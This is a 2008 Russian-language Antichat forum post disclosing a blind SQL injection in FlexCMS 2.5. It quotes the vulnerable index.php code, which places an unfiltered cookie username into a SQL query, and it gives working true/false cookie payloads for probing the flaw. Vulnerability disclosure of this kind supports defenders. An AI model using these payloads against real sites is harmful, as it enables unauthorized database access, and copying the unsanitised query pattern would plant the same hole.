ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
 
 
Опции темы Поиск в этой теме Опции просмотра

FlexCMS 2.5 Blind SQL-Injection
  #1  
Старый 16.12.2008, 02:53
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию FlexCMS 2.5 Blind SQL-Injection

FlexCMS 2.5 Blind SQL-Injection
Сайт: www.flexcms.com
Требования: magic_quotes_gpc = off
Тестилось на последней free версии, скаченной с офф сайта
Уязвимость в файле index.php
PHP код:
$CookieData $HTTP_COOKIE_VARS[$CookieName];

$LoggedIn 'n';
$UserLevel 0;
 
if (
$CookieData != '' && $CookieData != 'not_logged_in') {
    list (
$CookieUsername$CookiePassword) = split('=='$CookieData2);
    if (
$CookieUsername != '' && $CookiePassword != '') {
        
$query "select RecordNumber,Level,Password,DisplayName,SessionLength from `".$Settings['DBPrefix']."core-Users` where Username='$CookieUsername' LIMIT 1";
        
$result mysql_query($query) or die (mysql_error()); 
В cookies передаются логин и пасс, в таком виде
логин==зашифрованый_пасс
Т.к переменная $CookieUsername никак не фильтруется и при наличии magic_quotes_gpc = off есть возможность провести инъекцию

Example:
Код:
True: FCLoginData12345=qwerty'+and+1=1/*%3D%3DqwDyM1dbqwDyM1db9iOPI
False: FCLoginData12345=qwerty'+and+1=2/*%3D%3DqwDyM1dbqwDyM1db9iOPI
Сразу скажу что не тестил в нете. Бага вроде тоже нигде не описана, если чё удалите(

Последний раз редактировалось Spyder; 16.12.2008 в 02:59..
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ